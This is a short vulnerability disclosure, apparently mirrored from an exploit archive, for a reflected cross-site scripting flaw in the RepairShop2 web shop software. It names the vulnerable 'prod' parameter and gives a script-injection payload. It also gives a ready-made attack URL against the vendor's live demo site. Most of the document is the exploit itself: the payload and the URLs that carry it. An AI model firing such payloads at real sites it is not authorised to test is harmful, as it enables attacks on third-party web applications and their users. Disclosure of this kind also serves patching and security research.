id: 11396
date: 03/22/2010
title: RepairShop2 - Cross Site Scripting (XSS) Vulnerability
author: kaMtiEz
cves: 

======================================================
RepairShop2 - Cross Site Scripting (XSS) Vulnerability
======================================================


#############################################################################################################
## RepairShop2 - cross site scripting ( XSS )                                                           ##
## Author : kaMtiEz (kamzcrew@yahoo.com)   ##
## Homepage : http://www.indonesiancoder.com               ##
## Date : 20 March, 2010                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.realitymedias.com/
[+] Download : http://www.realitymedias.com/repairshop/?L=downloads
[+] version : 1.9.023
[+] Vulnerability : XSS
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER]

[ EXPLOIT ]

"><script>alert(666)</script>

[ DEMO ]

http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod="><script>alert(666)</script>



#  0day.today [2023-03-22]  #